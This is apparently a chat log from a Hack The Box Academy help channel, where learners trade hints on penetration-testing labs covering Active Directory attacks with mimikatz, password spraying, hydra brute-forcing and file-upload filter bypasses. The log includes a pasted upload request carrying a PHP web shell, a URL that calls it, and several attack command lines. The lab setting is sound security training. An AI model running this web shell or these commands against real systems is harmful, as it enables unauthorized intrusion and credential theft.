now do the same thing but use the internal ip when using downloading from windows

Hi I am on the information Gathering - Web Edition - Skills assessment. I have the answers to all but: What is the API key in the hidden admin directory that you have discovered on the target system? I know where the hidden directory is but I have tried gobuster but I am at a bit of a dead end what to do

the internal ip was tripping me up, i got it on the shell now, thank you!

i tried to use kerbrute with password spray but i get this error ERR_ETYPE_NOSUPP KDC has no support for encryption type

bross isn't listed 😭 what am i doing wrong now?

yoo don't spoil , also try others attack

or just read the ouput

try sekurlsa

i keep getting this error: mimikatz # sekurlsa::process lsass.exe
Switch to PROCESS

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

did you privilege::debug first

why he is DA

and he need NTLM of administrator ?

so ....

i need NTLM of bross, unless I need to crack the hash of the administrator and then use those creds to enumerate bross?

you got a DA , you can get any NTLM

you just need the right technique , check the ACLs part in the course

checking

oh yeah, then try the method method they showed

Update: KRDC doesn't work and Remmina doesn't work either. Going to have to spawn the PwnBox and try it from there.

is it ACL Abuse Tactics?

it's an ACL that is granted for DA

DA is short for Domain Admin right?

yeah

DM me for a nudge

How hackers access devices through a wifi?

just pinged you thanks

ya gpt isn't being helpful, and I'm not sure how to progress with your hints, been at this for close to 3 hours now sadly

magic

Update 2: Even Remmina and xfreerdp on the PwnBox aren't working. Now what?

Linux is the best way for hackers?

re-read this section Attacking Domain Trusts - Child -> Parent Trusts - from Windows

im not sure, remmina used to always work for me

Is there any way to check when I completed a module in Academy?

go to badges -> shared link you will find it there

Even using the machine's internal IP and attempting to connect from MSRDP on Target 1 doesn't work.

Everything returns "login failed for display 0." Is there another user and password I need to enumerate first?

can I dm you?

yeah

lol tedious but works, thanks!

Finally figured it out. The problem was I was attempting to use the same password for both machines.

Are we supposed to understand the results in the Service Scanning boxes initially? I just started the pentesting path. I'm reading through it all but I don't understand all of it to be honest.

messaged

Probably a little bit if you did some previous modules, but the more you scan the more you know what you’re looking at

The section breaks it down for you

@safe star

am I supposed to be doing a dcsync attack with mimi?

Understood, thank you.

iirc it should be the same attacks as the examples shown in the section

Dcsync and golden are the only mimikatz commands shown

ya

gpt is saying that the error is a permission issue, but i have the golden ticket

Don’t use gpt for that when you have the section in front of you

i'm only using gpt because I am big stuck

Gpt should help with explaining some commands and topics but it doesn’t really help in situations like this

The section has everything you need

the linux section has all I need, or the linux section plus the windows sections has all I need?

What part are u on?

After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross.

i have the shell with mimi installed is where I am at currently

You should be using Linux methods on the Linux portion

You don’t need mimikatz for the Linux part

I thought u were on the previous section

i did this part:

there isn't anything in the section after this

Why not secrets dump using the user you made

The user should be an enterprise admin

@novel lynx u get it yet?

i'm retryng now

In my office i suspected someone having access to my laptop.

And my phone too

In XSS phishing assessment, when I want to send the link, I encounter this error: "Issue in sending URL!" I have tried multiple times and reconnected to the VPN connection several times.

Most likely your url then

I checked the link. It works well, but I have the issue with sending.

If we enter an invalid URL, the error message is "Invalid URL." Not "Issue in sending URL!"

Yeah, I just got that message but it worked the second try

I havevtried more than 10 times 🙂

Did you restart?

Yes multiple time

are those the correct credentials?

Hmm, yeah idk then, you switched vpns too right?

Yes

Send me the the url

We can’t help you with that

I only get that error when I send its own url, so it might be your payload

Sent

hey can i dm

Dude you're awesome it helped so much it was so freaking simple now! have a nice weekend xD

to the people who have completed it, how long did the AD enum and attacks module take you?

10-15 days depends

About bruteforcing - Username Bruteforce section.

+ 0  Try running the same exercise on the question from the previous section, to learn how to brute force for users.

The command I am running is:

hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p amormio -u -f 94.237.53.113 -s 30445 http-get /

This is identical to what seems to be expected from the module. I'm actually going a little nuts here because this seems like such a stupid thing to be stuck on.

5 days

huh

It’s really long

around 2wks

did you spend 24 hours a day on it or what

if he got prior knowledge it will be easy for him

oh yeah that's true

Nah but I was familiar with most of it until the ACL and cross forest stuff

Just stuff from tcm

did the pnpt?

Pjpt

still have a second retake of the pnpt, was mega unprepared and tried doing the full asessment during a workweek lol

They upped the price by 200 😭

That's crazy... dang.

pjpt+ soon

hi, im starting at lineux privilege escalation module, but im stuck in the firts lab environment enumeration, the question is Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer? but i search all the files and i cant find the flag, can anyone help me pls?

hi

how i access to shell.php.\\.jpg

what do you mean

i already upload a web shell in that path, but i dont get in when i try to navegate there in url

Certain files arent seen unless you choose to see them

neither shell.php/.jpg

does the module tell you how to enumerate upload directories? if so have you tried those?

what do you mean

i don't know what module you're on so it's hard to help you

if you uploaded the shell maybe try looking at the source code

File Upload Attacks

whitelist filters

I have already managed to identify how to bypass file type restrictions in the backend. I added a webshell to those payloads, but I don't know how to access it. I tried encoding it to URL but I still can't do it.

idk what your shell code contains

can you reach your uploaded file?

shell code?

im telling you no and asking why

Hola! Estoy atascado en el modulo de enumeración web. Cuando quiero ejecutar algunos de los comandos me salen solamente errores, no se si yo estoy haciendo algo mal o que? Si alguien puede darme una mano se los agradecería.

only english taco

Ok

and when i go to root, it said i dont have permission

you haven’t escalated your privileges. thats why

i'd review the source code first

why lol

I CANT REACH IT

did you review the source code on the page you upload the file to?

you really need to know how the find command works for this question

look for HTB tho

in order to reach your uploaded web shell, you have to know the file path to use in the url to trigger it

Hi everyone, I doing the Linux fundamentals module - Navigation section, for the What is the index number of the "sudoers" file in the "/etc" directory?
I keep receiving an error to my answer. I've used the right command to see the index number but it's not taking my answer.

omg i know

u 99% wont find it manually

and to view the source code of the website you’re uploading to, you just use Ctrl+U

u need to make a find command that looks for the string HTB in each file

i already view the source code

so what you're expecting us to just tell you the answer?

¯_(ツ)_/¯

okay

@fathom pendant

pretty bad way of soliciting help from strangers imo

tom, we essentially gave you the answer without giving you the silver spoon that goes with it and you're not accepting it

maybe take the advice and review something you may have overlooked

why are you spitting that out?

take a breather lil bro

I don't know if you're looking for attention but Marcielee is not a stranger, has always helped in modules

yo let’s not let modules devolve into an argument

so did you find it?

marcie very likely also will not straight up give you the answer.

go back over the module if you have to. we told you what you needed to do.

I'm not looking for the answer, I'm looking for someone with the ability to help and understand the questions, not just to be told to do something I've already done.

bro why not just ctrl+f and search for the name of your webshell?

good work. but delete that cause it’s still a spoiler

For a index number of the specific file in a drectrory, there's two commands to use ls or stat correct? Am I missing a command?

pretty sure that was the only way to find it tbh

With all due respect, if you don't know about a topic, just say so, don't waste my time.

@elfin dust delete the whole thing you wrote. it’s still a spoiler cause it gives away where the flag is lol

Help? With what? In principle, all you have done is ask me to do things that I have already done. I am still waiting for some kind of help beyond trying to improvise support.

stop

ok, sorry, but why into that directory? i dont understand it

what exactly are u looking for? from what i seen they gave good directions

they just wanted you to use the find command correctly, it was way too deep to be common knowledge

maybe i can find it whit linpeas? i thought that directory isnt important to find files that containt sensitive information, ithougth / etc its important, /root its important but why that directory?

linpeas wouldnt flag a string like that

it was there just for us

ok tks for all the tips guys (Y)

yes in fact it is a good direction but I don't know what I've been asking why I can't access the routes where it is already written and in a php executable format a web shell, it's not as simple as remembering the name because the evasion includes characters that confuse the behavior of the page, but even url encoding the characters to avoid their ambiguity I still can't get the file on the web page, what makes me angry is that they tell me what I already did and then treat me as if I were looking for the answer, if I were looking for it I would have asked I am asking something specific, if they are going to improvise and waste time it is better that they don't do it and do things right

Hi everyone, For the Linux fundamentals module - Navigation section, for the What is the index number of the "sudoers" file in the "/etc" directory?
Is this question asking for an index number in a different context, such as a file's position in a directory listing or something else?

then its the wrong extension

It is literally the same name and file extension as the one I uploaded to the server, that is why it concerns me

let me show you

i mean that maybe that extension wasnt gonna work anyway

and find another set

Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://ip:port/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395223586137621495382826115921

Content-Length: 268
Origin: http://ip:port
DNT: 1
Connection: close
Sec-GPC: 1

-----------------------------395223586137621495382826115921
Content-Disposition: form-data; name="uploadFile"; filename="shell.php.\\.jpg"
Content-Type: image/jpeg

<?php system($_REQUEST['cmd']); ?>
-----------------------------395223586137621495382826115921--
```  and this is the response:  ```HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 01:03:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

File successfully uploaded```

http://ip:port/profile_images/shell.php.%5C%5C.jpg?cmd=ls I GET NO FOUND

yeah if you look in the source u can see it doesnt appear

you can assume that slashes just wont work in this case

AD path - MSSQL module first part; not sure why this is not working - tried several variants including updated impacket. can ping and nmap the machine, service (mssql) is up on 1433, can rdp in and go about it that method but curious what the issue is here

Not Found

The requested URL was not found on this server.
Apache/2.4.41 (Ubuntu) Server at ip Port port

hey yall. i'm in AD Enumeratoin & Attacks Skills Assessment Part 2 Questoin 7. I'm trying to use mssqlclient.py but i keep getting a TimeoutError message. i used python3 and -windows-auth. are there any alternatives yall recommend?

its def there but the file wont load correctly with slashes

tack on a -windows-auth at the end of that command and let me know if that works

if you haven’t already and it’s just cut off in the screenshot

i did try it, but that too was unsuccessful. Strange because I've used this many times and seem to regularly have an issue @hushed sail

ls -i

You finally got to my initial question and you didn't get tangled up like them, but then how do I do that? There is also: shell.php%2F.jpg (shell.php/.jpg) which also uploads the file correctly, but the same problem occurs, I can't access the file, do you have any clue? I know I'm close.

try extension combinations that dont use slash

there's a slash in the username

Tried that but the answer is not being taken when I submit it

they gave you a script in the section, just edit what you do or dont need @uneven cairn

The fuzzing result gives me only successful file upload results with the payloads I showed (they have slashes)

sorry

you let me got something, thank you im done here

is that an issue? I've used it before successfully and HackTricks and what not recommend domain/username:pass@ip

u sure?

on the sudoers file?

Yes I tried ls -I /etc/sudoers and stat /etc/sudoers

does it start with 1 and end with 7

No, starts with 1 and ends with 8

try restarting the machine

Okay trying it again

Yeah it's still the same outcome

send a screeshot in dm

Any help with my question above?

have u tried impacket?

impacket-mssqlclient

should probably use htb.local instead, and you don't have to give a domain name for mssql client

Gonna try it

huh

mssqlcient.py is impacket

ik but i thought those were older versions instead of aliases

nah the impacket-x stuff is installed with apt which is not really the right way to install and can cause problems, and those are usually the older version since the apt repo is not updated regularly

yeah, that would make more sense

That didn't work either 😩

you're goin through a pivot right?

or is this all on the attack machine

Well that's the thing. Apparently im supposed to use mssqlclient on the jump box, and I'm also supposed to start http.server on the same jump box...which is confusing as heck. At least those are what the notes from a buddy of mine that completed the entire path 🤷🏽‍♂️

so are u doing everything on from jumpbox or tunneling stuff through it from your host machine?

The only time I tunneled was when I SSH'd into HTB-student. That was the only way I can get xfreerdp to work.

I just don't see what my issue is, now on updated impacket in a venv 😮

But no, not everything I'm doing is from the jump box.

send a pic of the commands in dm

Give me maybe about five minutes

wait are you sure student is the right username to use and not just for rdp

in the mssqlcient command earlier in the section another username was used

hmmmmmmmmmm I'll check

Hello Xre0uS, would you please help me with my issue?

but that's module 1 in the section

yeah ws_dev

x_x

Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://ip:port/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395223586137621495382826115921

Content-Length: 268
Origin: http://ip:port
DNT: 1
Connection: close
Sec-GPC: 1

-----------------------------395223586137621495382826115921
Content-Disposition: form-data; name="uploadFile"; filename="shell.php.\\.jpg"
Content-Type: image/jpeg

<?php system($_REQUEST['cmd']); ?>
-----------------------------395223586137621495382826115921--```

  and this is the response:  

```HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 01:03:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

File successfully uploaded

http://ip:port/profile_images/shell.php.%5C%5C.jpg?cmd=ls  I GET NO FOUND```

i thought u got it?

all im gonna say is that it requires no special characters

I was trying to add more file extensions to the script to see if other combinations would work.

yes and remove the special characters loop

it should be a pretty short list

if you get not found that means the file isn't being uploaded correctly or it's not being saved to the server with the name you expect